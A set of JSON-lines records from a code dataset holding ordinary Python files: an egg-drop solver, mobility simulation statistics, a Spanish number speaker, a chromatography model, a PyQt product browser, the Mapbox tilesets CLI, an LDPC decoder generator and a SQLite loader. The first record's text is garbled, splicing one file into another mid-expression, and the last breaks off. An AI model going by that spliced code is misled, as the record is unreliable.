+{"seq_id":"454372841","text":"import sys\r\ndef check(egg,count):\r\n if egg==0:return 0\r\n else:\r\n total=0\r\n for i in range(count):total+=check(egg-1,i)+1\r\n return total\r\ndef crack_egg(egg,floor,count=0):\r\n while check(egg,count) 0:\n t = 0\n unique = set()\n for c in contacts_j:\n t += c.duration\n unique.add(c.indiv_i)\n\n counts.append(len(contacts_j))\n counts_unique.append(len(unique))\n total_contact_time.append(t)\n ave_contact_time.append(t / len(contacts_j))\n ave_contact_time_unique.append(t / len(unique))\n\n else:\n empty += 1\n\n print('empty = ', empty)\n\n return dict(\n counts=counts,\n counts_unique=counts_unique,\n total_contact_time=total_contact_time,\n ave_contact_time=ave_contact_time,\n ave_contact_time_unique=ave_contact_time_unique,\n )\n\n\ndef comp_stats(arr0, arr1):\n return {\n 'mean': np.mean(arr0) / np.mean(arr1),\n 'median': np.median(arr0) / np.median(arr1),\n 'max': np.max(arr0) / np.max(arr1),\n }\n\n\ndef compute_mob_statistics(loc_tup, days, max_people, verbose=False):\n '''Computes all MobilitySimulator statistics for given `country` and `area` '''\n\n country, area = loc_tup\n\n if verbose:\n print(country, area)\n\n # get mobility simulator settings\n statistics = dict()\n mob_settings_downsampled, mob_settings_full = calibration_mob_paths[country][area]\n\n # downsampled\n with open(mob_settings_downsampled, 'rb') as fp:\n obj = pickle.load(fp)\n mob_downsampled = MobilitySimulator(**obj)\n mob_downsampled.verbose = verbose\n mob_downsampled.simulate(max_time=days * TO_HOURS, lazy_contacts=True)\n\n # full\n with open(mob_settings_full, 'rb') as fp:\n obj = pickle.load(fp)\n mob_full = MobilitySimulator(**obj)\n mob_full.verbose = verbose\n mob_full.simulate(max_time=days * TO_HOURS, lazy_contacts=True)\n\n # compute contact information\n contact_info_downsampled = get_stats(\n mob_downsampled, max_people, verbose=verbose)\n del mob_downsampled\n contact_info_full = get_stats(mob_full, max_people, verbose=verbose)\n del mob_full\n\n # summarize\n for s in contact_info_downsampled.keys():\n\n fig = plt.figure(figsize=(4, 7))\n ax0 = fig.add_subplot(211)\n ax0.hist(contact_info_downsampled[s])\n ax0.set_title('downsampled')\n xlim0 = ax0.get_xlim()\n ax1 = fig.add_subplot(212)\n ax1.hist(contact_info_full[s])\n ax1.set_title('full')\n xlim1 = ax1.get_xlim()\n\n ax0.set_xlim((min(xlim0[0], xlim1[0]), max(xlim0[1], xlim1[1])))\n ax1.set_xlim((min(xlim0[0], xlim1[0]), max(xlim0[1], xlim1[1])))\n fig.suptitle(s)\n plt.savefig('plots/betaScaling-' + loc_tup[0] + '-' + loc_tup[1] + '-' + s + '.png', format='png', facecolor=None,\n dpi=200, bbox_inches='tight')\n plt.close('all')\n\n d = comp_stats(\n contact_info_downsampled[s],\n contact_info_full[s])\n for k, v in d.items():\n statistics['ratio-' + k + '-' + s] = v\n\n # print always\n print(country, area)\n pprint(statistics)\n\n return statistics\n\n\nif __name__ == '__main__':\n\n days = 7.0\n max_people = 5000\n parallel = False\n cpu_count = 2\n\n locs = [\n ('GER', 'TU'), ('GER', 'KL'), ('GER', 'RH'), ('GER', 'TR'),\n ('CH', 'VD'), ('CH', 'BE'), ('CH', 'TI'), ('CH', 'JU'),\n ]\n\n # run in parallel for all locs\n if parallel:\n with ProcessPoolExecutor(cpu_count) as ex:\n res = ex.map(\n compute_mob_statistics,\n locs,\n [days for _ in locs],\n [max_people for _ in locs]\n )\n else:\n res = [compute_mob_statistics(\n tup, days, max_people, verbose=True) for tup in locs]\n\n # print all statistics\n all_statistics_unordered = dict(zip(locs, res))\n\n pprint(all_statistics_unordered)\n\n all_statistics = dict()\n\n for s in res[0].keys():\n all_statistics[s] = dict()\n for loc_tup in locs:\n all_statistics[s][loc_tup] = all_statistics_unordered[loc_tup][s]\n\n print('\\nStatistics by type:')\n pprint(all_statistics)\n","sub_path":"sim/betaScaling.py","file_name":"betaScaling.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"256013927","text":"import pyaudio\r\nimport wave\r\nimport sys\r\nCHUNK=1024\r\ndef talk(op=''):\r\n p = pyaudio.PyAudio()\r\n\r\n stream = p.open(format=p.get_format_from_width(op.getsampwidth()),\r\n channels=op.getnchannels(),\r\n rate=op.getframerate(),\r\n output=True)\r\n\r\n data = op.readframes(CHUNK)\r\n\r\n while len(data) > 0:\r\n stream.write(data)\r\n data = op.readframes(CHUNK)\r\n\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n p.terminate()\r\ndef numeros():\r\n import math\r\n unidad=[\" \",\"n1\",\"n2\",\"n3\",\"n4\",\"n5\",\"n6\",\"n7\",\"n8\",\"n9\",\"n10\"]\r\n esp=[\" \",\"n11\",\"n12\",\"n13\",\"n14\",\"n15\",\"n16\",\"n17\",\"n18\",\"n19\"]\r\n decenas = [\"\",\"n10\",\"n20\", \"n30\",\"n40\",\"n50\", \"n60\",\"n70\", \"n80\", \"n90\"]\r\n centenas = [\"n100\",\"n100.2\",\"n200\",\"n300\",\"n400\",\"n500\",\"n600\",\"n700\",\"n800\",\"n900\"]\r\n \r\n local=\"./nu/\"\r\n print(\"**Suma de numeros Menor de 1000**\")\r\n su1=int(input(\"Digite el primer numero:\"))\r\n su2=int(input(\"Digite el segundo numero:\"))\r\n num=su1+su2\r\n \r\n if (num < 9):\r\n op=wave.open(local+unidad[num]+\".wav\")\r\n talk(op)\r\n elif (num==10):\r\n op=wave.open(local+\"n10.wav\")\r\n talk(op)\r\n elif (num>11 and num<20):\r\n num=num-10\r\n op=wave.open(local+esp[num]+\".wav\")\r\n talk(op)\r\n elif (num >= 20 and num < 100):\r\n u= (num%10)\r\n d=int(num/10)\r\n op=wave.open(local+decenas[d]+\".wav\")\r\n if (u==0):\r\n talk(op)\r\n else:\r\n op1=wave.open(local+\"y.wav\")\r\n op2=wave.open(local+unidad[u]+\".wav\")\r\n [talk(op),talk(op1),talk(op2)]\r\n elif (num >=100 and num <=1000):\r\n if(num==1000):\r\n op=wave.open(local+\"n1000.wav\")\r\n talk(op)\r\n elif(num<1000):\r\n c=int(num/100)\r\n d=int((num-(c*100))/10)\r\n u=int(num-(c*100+d*10))\r\n if(u==0):\r\n if(d==0):\r\n op=wave.open(local+centenas[0]+\".wav\")\r\n talk(op)\r\n else:\r\n op1=wave.open(local+centenas[c]+\".wav\")\r\n op2=wave.open(local+decenas[d]+\".wav\")\r\n [talk(op1),talk(op2)]\r\n else:\r\n if(d == 1) and (u == 1,2,3,4,5,6,7,8,9):\r\n\r\n op=wave.open(local+centenas[c]+\".wav\")\r\n op1=wave.open(local+esp[u]+\".wav\")\r\n [talk(op),talk(op1)]\r\n else:\r\n op=wave.open(local+centenas[c]+\".wav\")\r\n op1=wave.open(local+decenas[d]+\".wav\")\r\n op2=wave.open(local+\"y.wav\")\r\n op3=wave.open(local+unidad[u]+\".wav\")\r\n [talk(op),talk(op1),talk(op2),talk(op3)]\r\n\r\nnumeros()\r\n\r\n\r\n\r\n \r\n","sub_path":"facial recognition/talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"141520706","text":"from pychrom.modeling.cadet_modeler import CadetModeler\nfrom pychrom.core import *\nfrom pychrom.opt.casadi.build_utils import *\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\n\ncomps = ['A',\n 'B',\n 'C',\n 'D']\n\nGRM = GRModel(components=comps)\n\n# create sections\nGRM.load = Section(components=comps)\nfor cname in comps:\n GRM.load.set_a0(cname, 1.0)\n\nGRM.load.set_a0('A', 50.0)\nGRM.load.set_a1('A', 0.0)\nGRM.load.start_time_sec = 0.0\n\nGRM.wash = Section(components=comps)\nGRM.wash.set_a0('A', 50.0)\nGRM.wash.start_time_sec = 10.0\n\nGRM.elute = Section(components=comps)\nGRM.elute.set_a0('A', 100.0)\nGRM.elute.set_a1('A', 0.2)\nGRM.elute.start_time_sec = 90.0\n\n# create inlet\nGRM.inlet = Inlet(components=comps)\nGRM.inlet.add_section('load')\nGRM.inlet.add_section('wash')\nGRM.inlet.add_section('elute')\n\n# create binding\nGRM.salt = 'A'\nGRM.binding = SMABinding(data=\"sma.yml\")\nGRM.binding.is_kinetic = True\n\n# create column\nGRM.column = Column(data=\"column.yml\")\n\n# create outlet\nGRM.outlet = Outlet(components=comps)\n\n# connect units\nGRM.connect_unit_operations('inlet', 'column')\nGRM.connect_unit_operations('column', 'outlet')\n\nfor name in GRM.list_components():\n nu = 1.0\n GRM.column.binding_model.set_nu(name, nu)\n\ncwrapper = CasadiColumn(GRM.column)\nlspan = np.linspace(0, GRM.column.length, 50)\ncwrapper.build_model(lspan, nominal_c={'A': 50}, nominal_q={'A': 1200})\n\n# defines grid of times\ntspan = np.linspace(0, 1500, 1500)\nresults = cwrapper.solve(tspan)\n\nfor cname in results.components:\n if cname !='A':\n to_plot = results.C.sel(component=cname)\n plot2d = to_plot.sel(col_loc=GRM.column.length)\n plt.plot(plot2d.time, plot2d)\nplt.show()\n\n","sub_path":"pychrom/opt/casadi/simulating_sma.py","file_name":"simulating_sma.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"303688508","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtSql import *\n\nfrom view_product_details import *\n\nclass BrowseProductSearchResults(QWidget):\n cancel_button_signal = pyqtSignal()\n\n def __init__(self, search_type, search_name):\n super().__init__()\n \n self.table_view = QTableView()\n self.table_view.setSelectionBehavior(1)\n self.table_view.setEditTriggers(self.table_view.EditTrigger(0))\n self.cancel_button = QPushButton(\"Close\")\n self.information_label = QLabel('To view information about a product, click on the product and click \"View iformation\"')\n self.view_button = QPushButton(\"View information\")\n\n self.information_label.setAlignment(Qt.Alignment(4))\n\n self.layout = QVBoxLayout()\n self.layout.addWidget(self.information_label)\n self.layout.addWidget(self.table_view)\n self.layout.addWidget(self.cancel_button)\n self.layout.addWidget(self.view_button)\n\n self.setLayout(self.layout)\n\n self.create_table_model(search_type, search_name)\n\n #Connection\n self.cancel_button.clicked.connect(self.cancel_button_clicked)\n self.view_button.clicked.connect(self.view_button_clicked)\n\n def create_table_model(self, search_type, search_name):\n self.model = QSqlTableModel()\n query = QSqlQuery()\n if search_type == \"product_type_ID\":\n query.prepare(\"\"\"SELECT * FROM Product WHERE ProductTypeID = ?\"\"\")\n query.addBindValue(search_name)\n query.exec_()\n elif search_type == \"kit_name\" or \"blank_name\":\n query.prepare(\"\"\"SELECT PartID FROM Part WHERE PartName = ?\"\"\")\n query.addBindValue(search_name)\n query.exec_()\n while query.next():\n id_number = query.value(0)\n query.prepare(\"\"\"SELECT * FROM ProductParts WHERE PartID = ?\"\"\")\n query.addBindValue(id_number)\n query.exec_()\n self.model.setQuery(query)\n self.model.setEditStrategy(QSqlTableModel.OnManualSubmit)\n self.table_view.setModel(self.model)\n self.table_view.model().select()\n\n def product(self):\n self.index = self.table_view.selectedIndexes()\n self.product_id = self.table_view.model().data(self.index[0])\n query = QSqlQuery()\n query.prepare(\"\"\"SELECT Price, ProductTypeID, Quantity, ProductStatus FROM Product WHERE ProductID = ?\"\"\")\n query.addBindValue(self.product_id)\n query.exec_()\n while query.next():\n self.product_price = query.value(0)\n self.product_type_id = query.value(1)\n self.product_quantity = query.value(2)\n self.product_status = query.value(3)\n self.part_id = []\n query.prepare(\"\"\"SELECT PartID FROM ProductParts WHERE ProductID = ?\"\"\")\n query.addBindValue(self.product_id)\n query.exec_()\n while query.next():\n self.part_id.append(query.value(0))\n self.kit_id = self.part_id[0]\n self.blank_id = self.part_id[1]\n query.prepare(\"\"\"SELECT ProductType FROM ProductType WHERE ProductTypeID = ?\"\"\")\n query.addBindValue(self.product_type_id)\n query.exec_()\n while query.next():\n self.product_type = query.value(0)\n query.prepare(\"\"\"SELECT PartName FROM Part WHERE PartID = ?\"\"\")\n query.addBindValue(self.kit_id)\n query.exec_()\n while query.next():\n self.kit_name = query.value(0)\n query.prepare(\"\"\"SELECT PartName FROM Part WHERE PartID = ?\"\"\")\n query.addBindValue(self.blank_id)\n query.exec_()\n while query.next():\n self.blank_name = query.value(0)\n details = {\"product id\":self.product_id,\n \"product type\":self.product_type,\n \"price\":self.product_price,\n \"kit_name\":self.kit_name,\n \"blank_name\":self.blank_name,\n \"quantity\":self.product_quantity,\n \"status\":self.product_status}\n return details\n\n def view_button_clicked(self):\n details = self.product()\n dialog = ViewProductDetails(details)\n dialog.exec_()\n\n def cancel_button_clicked(self):\n self.cancel_button_signal.emit()\n","sub_path":"browse_product_search_results.py","file_name":"browse_product_search_results.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"65339408","text":"def process_scores():\n scores_txt = open(\"scores.txt\", \"r\")\n scores = {}\n for line in scores_txt:\n line = line.rstrip()\n restaurant, score = line.split(\":\")\n scores[restaurant] = int(score)\n\n return scores\n\n\ndef add_restaurant(scores):\n \n\n print(\"Please add a rating for your favorite restaurant!\")\n restaurant = input(\"Restaurant name> \")\n rating = int(input(\"Rating> \"))\n\n scores[restaurant] = rating\n\n\ndef print_sorted_scores(scores):\n \n\n for restaurant, rating in sorted(scores.items()):\n print(\"{restaurant} is rated at {rating}.\")\nscores = process_scores()\nadd_restaurant(scores)\nprint_sorted_scores(scores)\n","sub_path":"ratings.py","file_name":"ratings.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"530766637","text":"\"\"\"Tilesets command line interface\"\"\"\nimport os\nimport json\nimport requests\nimport tempfile\n\nimport click\nimport cligj\nfrom requests_toolbelt import MultipartEncoder\n\nimport mapbox_tilesets\nfrom mapbox_tilesets import utils, errors\n\n\ndef _get_token(token=None):\n \"\"\"Get Mapbox access token from arg or environment\"\"\"\n if token is not None:\n return token\n else:\n return os.environ.get(\"MAPBOX_ACCESS_TOKEN\") or os.environ.get(\n \"MapboxAccessToken\"\n )\n\n\ndef _get_api():\n \"\"\"Get Mapbox tileset API base URL from environment\"\"\"\n return os.environ.get(\"MAPBOX_API\", \"https://api.mapbox.com\")\n\n\n@click.version_option(version=mapbox_tilesets.__version__, message=\"%(version)s\")\n@click.group()\ndef cli():\n \"\"\"This is the command line interface for the Mapbox Tilesets API.\n Thanks for joining us.\n\n This CLI requires a Mapbox access token. You can either set it in your environment as\n \"MAPBOX_ACCESS_TOKEN\" or \"MapboxAccessToken\" or pass it to each command with the --token flag.\n \"\"\"\n\n\n@cli.command(\"create\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\n \"--recipe\",\n \"-r\",\n required=True,\n type=click.Path(exists=True),\n help=\"path to a Recipe JSON document\",\n)\n@click.option(\"--name\", \"-n\", required=True, type=str, help=\"name of the tileset\")\n@click.option(\n \"--description\", \"-d\", required=False, type=str, help=\"description of the tileset\"\n)\n@click.option(\n \"--privacy\",\n \"-p\",\n required=False,\n type=click.Choice([\"public\", \"private\"]),\n help=\"set the tileset privacy options\",\n)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef create(\n tileset, recipe, name=None, description=None, privacy=None, token=None, indent=None\n):\n \"\"\"Create a new tileset with a recipe.\n\n $ tilesets create \n\n is in the form of username.handle - for example \"mapbox.neat-tileset\".\n The handle may only include \"-\" or \"_\" special characters.\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n body = {}\n body[\"name\"] = name or \"\"\n body[\"description\"] = description or \"\"\n if privacy:\n body[\"private\"] = True if privacy == \"private\" else False\n\n if not utils.validate_tileset_id(tileset):\n raise errors.TilesetNameError\n\n if recipe:\n with open(recipe) as json_recipe:\n body[\"recipe\"] = json.load(json_recipe)\n\n r = requests.post(url, json=body)\n\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"publish\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef publish(tileset, token=None, indent=None):\n \"\"\"Publish your tileset.\n\n tilesets publish \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/publish?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n r = requests.post(url)\n if r.status_code == 200:\n click.echo(json.dumps(r.json(), indent=indent))\n click.echo(\n f\"You can view the status of your tileset with the `tilesets status {tileset}` command.\",\n err=True,\n )\n else:\n raise errors.TilesetsError(f\"{r.text}\")\n\n\n@cli.command(\"status\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef status(tileset, token=None, indent=None):\n \"\"\"View the current queue/processing/complete status of your tileset.\n\n tilesets status \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/status?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n r = requests.get(url)\n\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"jobs\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\"--stage\", \"-s\", required=False, type=str, help=\"job stage\")\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef jobs(tileset, stage, token=None, indent=None):\n \"\"\"View all jobs for a particular tileset.\n\n tilesets jobs \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/jobs?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n if stage:\n url = \"{0}/tilesets/v1/{1}/jobs?stage={2}&access_token={3}\".format(\n mapbox_api, tileset, stage, mapbox_token\n )\n\n r = requests.get(url)\n\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"job\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.argument(\"job_id\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef job(tileset, job_id, token=None, indent=None):\n \"\"\"View a single job for a particular tileset.\n\n tilesets job \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/jobs/{2}?access_token={3}\".format(\n mapbox_api, tileset, job_id, mapbox_token\n )\n r = requests.get(url)\n\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"list\")\n@click.argument(\"username\", required=True, type=str)\n@click.option(\n \"--verbose\",\n \"-v\",\n required=False,\n is_flag=True,\n help=\"Will print all tileset information\",\n)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef list(username, verbose, token=None, indent=None):\n \"\"\"List all tilesets for an account.\n By default the response is a simple list of tileset IDs.\n If you would like an array of all tileset's information,\n use the --versbose flag.\n\n tilests list \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}?access_token={2}\".format(\n mapbox_api, username, mapbox_token\n )\n r = requests.get(url)\n if r.status_code == 200:\n if verbose:\n for tileset in r.json():\n click.echo(json.dumps(tileset, indent=indent))\n else:\n for tileset in r.json():\n click.echo(tileset[\"id\"])\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"validate-recipe\")\n@click.argument(\"recipe\", required=True, type=click.Path(exists=True))\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef validate_recipe(recipe, token=None, indent=None):\n \"\"\"Validate a Recipe JSON document\n\n tilesets validate-recipe \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/validateRecipe?access_token={1}\".format(\n mapbox_api, mapbox_token\n )\n with open(recipe) as json_recipe:\n recipe_json = json.load(json_recipe)\n\n r = requests.put(url, json=recipe_json)\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"view-recipe\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef view_recipe(tileset, token=None, indent=None):\n \"\"\"View a tileset's recipe JSON\n\n tilesets view-recipe \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/recipe?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n r = requests.get(url)\n if r.status_code == 200:\n click.echo(json.dumps(r.json(), indent=indent))\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"update-recipe\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.argument(\"recipe\", required=True, type=click.Path(exists=True))\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef update_recipe(tileset, recipe, token=None, indent=None):\n \"\"\"Update a Recipe JSON document for a particular tileset\n\n tilesets update-recipe \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/recipe?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n with open(recipe) as json_recipe:\n recipe_json = json.load(json_recipe)\n\n r = requests.patch(url, json=recipe_json)\n if r.status_code == 201:\n click.echo(\"Updated recipe.\", err=True)\n click.echo(r.text)\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"validate-source\")\n@cligj.features_in_arg\ndef validate_source(features):\n \"\"\"Validate your source file.\n $ tilesets validate-source \n \"\"\"\n click.echo(f\"Validating features\", err=True)\n\n for feature in features:\n utils.validate_geojson(feature)\n\n click.echo(\"✔ valid\")\n\n\n@cli.command(\"add-source\")\n@click.argument(\"username\", required=True, type=str)\n@click.argument(\"id\", required=True, type=str)\n@cligj.features_in_arg\n@click.option(\"--no-validation\", is_flag=True, help=\"Bypass source file validation\")\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\n@click.pass_context\ndef add_source(ctx, username, id, features, no_validation, token=None, indent=None):\n \"\"\"Create/add a tileset source\n\n tilesets add-source \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = (\n f\"{mapbox_api}/tilesets/v1/sources/{username}/{id}?access_token={mapbox_token}\"\n )\n\n with tempfile.TemporaryFile() as file:\n for feature in features:\n if not no_validation:\n utils.validate_geojson(feature)\n file.write((json.dumps(feature) + \"\\n\").encode(\"utf-8\"))\n\n file.seek(0)\n m = MultipartEncoder(fields={\"file\": (\"file\", file)})\n resp = requests.post(\n url,\n data=m,\n headers={\n \"Content-Disposition\": \"multipart/form-data\",\n \"Content-type\": m.content_type,\n },\n )\n\n if resp.status_code == 200:\n click.echo(json.dumps(resp.json(), indent=indent))\n else:\n raise errors.TilesetsError(resp.text)\n\n\n@cli.command(\"view-source\")\n@click.argument(\"username\", required=True, type=str)\n@click.argument(\"id\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef view_source(username, id, token=None, indent=None):\n \"\"\"View a Tileset Source's information\n\n tilesets view-source \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/sources/{1}/{2}?access_token={3}\".format(\n mapbox_api, username, id, mapbox_token\n )\n r = requests.get(url)\n if r.status_code == 200:\n click.echo(json.dumps(r.json(), indent=indent))\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"delete-source\")\n@click.argument(\"username\", required=True, type=str)\n@click.argument(\"id\", required=True, type=str)\n@click.option(\"--force\", \"-f\", is_flag=True, help=\"Circumvents confirmation prompt\")\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\ndef delete_source(username, id, force, token=None):\n \"\"\"Delete a Tileset Source + all of its files.\n\n tilesets delete-source \n \"\"\"\n if not force:\n click.confirm(\n \"Are you sure you want to delete {0} {1}?\".format(username, id), abort=True\n )\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/sources/{1}/{2}?access_token={3}\".format(\n mapbox_api, username, id, mapbox_token\n )\n r = requests.delete(url)\n if r.status_code == 204:\n click.echo(\"Source deleted.\")\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"list-sources\")\n@click.argument(\"username\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\ndef list_sources(username, token=None):\n \"\"\"List all Tileset Sources for an account. Response is an un-ordered array of sources.\n\n tilesets list-sources \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/sources/{1}?access_token={2}\".format(\n mapbox_api, username, mapbox_token\n )\n r = requests.get(url)\n if r.status_code == 200:\n for source in r.json():\n click.echo(source[\"id\"])\n else:\n raise errors.TilesetsError(r.text)\n","sub_path":"mapbox_tilesets/scripts/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":13707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"93968242","text":"import matplotlib.pyplot as plt\n\nfrom AWGN_Channel_Transmission.AWGN_Discrete_Density_Evolution import \\\n AWGN_Discrete_Density_Evolution_class_irregular as DDE_irregular\nfrom Discrete_LDPC_decoding.Information_Matching import *\n\n__author__ = \"Maximilian Stark\"\n__copyright__ = \"2016, Institute of Communications, University of Technology Hamburg\"\n__credits__ = [\"Maximilian Stark\"]\n__version__ = \"1.0\"\n__email__ = \"maximilian.stark@tuhh.de\"\n__status__ = \"Production\"\n__name__ = \"Decoder Generation\"\n__doc__ = \"\"\"This script generates a discrete decoder for the desired design-Eb/N0.\"\"\"\n\n\n\n# set noise level for DE\nEbN0_dB_mapping_gen = 0.7\nfor EbN0_dB_mapping_gen in np.array([0.6,0.7,0.8,0.9,1.0]):\n # set quantizer limits\n AD_Max_abs = 3\n plt.figure()\n\n cardinality_Y_channel = 2000\n cardinality_T_channel = 16\n cardinality_T_decoder_ops = 16\n i_max = 50\n nror = 10\n\n # 1 2 3 4 5 6 7\n d_c_dist = np.array([0,0,0,0,0,1,32399]) / 32400\n # 1 2 3 4 5 6 7 8\n d_v_dist = np.array([1,32399,19440,0,0,0,0,12960])/64800\n\n\n lambda_vec = convert_node_to_edge_degree(d_v_dist)\n rho_vec = convert_node_to_edge_degree(d_c_dist)\n\n #R_c = 1-d_v/d_c # code rate\n R_c = 1 - (d_v_dist*(np.arange(d_v_dist.shape[0])+1)).sum() / (d_c_dist*(np.arange(d_c_dist.shape[0])+1)).sum() # code rate\n\n sigma_n2 = 10**(-EbN0_dB_mapping_gen/10) / (2*R_c)\n steps = 5\n\n config = 'cas'\n # generate decoder config\n DDE_inst = DDE_irregular(sigma_n2, AD_Max_abs, cardinality_Y_channel, cardinality_T_channel,\n cardinality_T_decoder_ops, lambda_vec, rho_vec, i_max, nror , match = True)\n\n DDE_inst.run_discrete_density_evolution()\n DDE_inst.save_config(config)\n plt.plot(DDE_inst.DDE_inst_data['MI_T_dvm1_v_X_dvm1_v'],label='match')\n\n\n # DDE_inst = DDE_irregular(sigma_n2, AD_Max_abs, cardinality_Y_channel, cardinality_T_channel,\n # cardinality_T_decoder_ops, lambda_vec, rho_vec, i_max, nror , match = False)\n #\n # DDE_inst.run_discrete_density_evolution()\n # DDE_inst.save_config('adapt_no_match')\n # plt.plot(DDE_inst.DDE_inst_data['MI_T_dvm1_v_X_dvm1_v'],label='no match')\n # plt.legend(loc=4)\n ","sub_path":"Irregular_LDPC_Decoding/DVB-S2/decoder_config_generation.py","file_name":"decoder_config_generation.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"256562645","text":"import csv\nimport sqlite3\n\n\nconnection = sqlite3.connect('/home/haletod/PycharmProjects/Ligase/students_and_alcohol.db')\ncursor = connection.cursor()\n\n\n# create table with students info\n\n(cursor.execute(\n \"CREATE TABLE IF NOT EXISTS students_info (student_id INTEGER, sex TEXT, age INTEGER, famsize TEXT, Pstatus TEXT, \"\n \"failures INTEGER, health INTEGER, guardian TEXT, PRIMARY KEY(student_id));\"))\n\nwith open('students.csv') as csv_data:\n data = csv.DictReader(csv_data)\n to_db = [\n (i['student_id'], i['sex'], i['age'], i['famsize'], i['Pstatus'], i['failures'], i['health'], i['guardian'])\n for i in data]\n\n(cursor.executemany(\n \"INSERT INTO students_info (student_id, sex, age, famsize, Pstatus, failures, health, guardian) \"\n \"VALUES (?, ?, ?, ?, ?, ?, ?, ?);\",\n to_db))\n\n\n# create table with students alcohol consumption\n\n(cursor.execute(\n \"CREATE TABLE IF NOT EXISTS 